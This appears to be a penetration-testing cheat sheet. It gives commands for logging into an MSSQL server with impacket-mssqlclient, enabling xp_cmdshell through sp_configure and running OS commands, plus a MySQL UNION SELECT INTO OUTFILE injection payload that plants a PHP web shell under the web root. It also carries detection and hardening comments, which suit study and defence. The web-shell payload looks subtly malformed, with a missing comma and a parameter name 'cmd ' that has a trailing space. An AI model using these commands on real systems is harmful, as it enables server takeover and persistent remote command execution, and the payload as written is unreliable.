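# add command execution (xp_cmdshell) to an MSSQL db
# xp_cmdshell is disabled by default; changing it needs ALTER SETTINGS (sysadmin / serveradmin)
# connect to db (-windows-auth = Windows/NTLM login instead of a SQL Server login)
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth;
# enable advanced options (xp_cmdshell is an advanced option, not settable until this is 1)
SQL> EXECUTE sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
# enable shell
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;
# execute commands (for a sysadmin caller they run as the SQL Server service account)
SQL> EXECUTE xp_cmdshell "whoami"
# detection: each sp_configure change is written to the SQL Server error log
#   ("Configuration option 'xp_cmdshell' changed from 0 to 1"); also watch for cmd.exe spawned by sqlservr.exe
# cleanup: set 'xp_cmdshell' and 'show advanced options' back to 0, RECONFIGURE after each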
# example payload for sql file inclusion to revshell
# this one is MySQL/MariaDB (INTO OUTFILE), not MSSQL: an injected UNION SELECT whose output is
# written as a PHP file under the web root, giving a web shell that takes commands via a GET parameter
# depends on server config: DB account holds the FILE privilege, secure_file_priv permits the target
# path, and the mysqld OS user can write into the web directory
# hardening: point secure_file_priv at a non-web directory, revoke FILE from application accounts,
# keep the web root non-writable for the database service user
# detection: new .php files under the web root owned by the DB service user; INTO OUTFILE in query / WAF logs
UNION SELECT "<?php system($_GET['cmd ']);?>" null, null, null, null INTO OUTFILE
"/var/www/html/tmp/webshell.php" -- //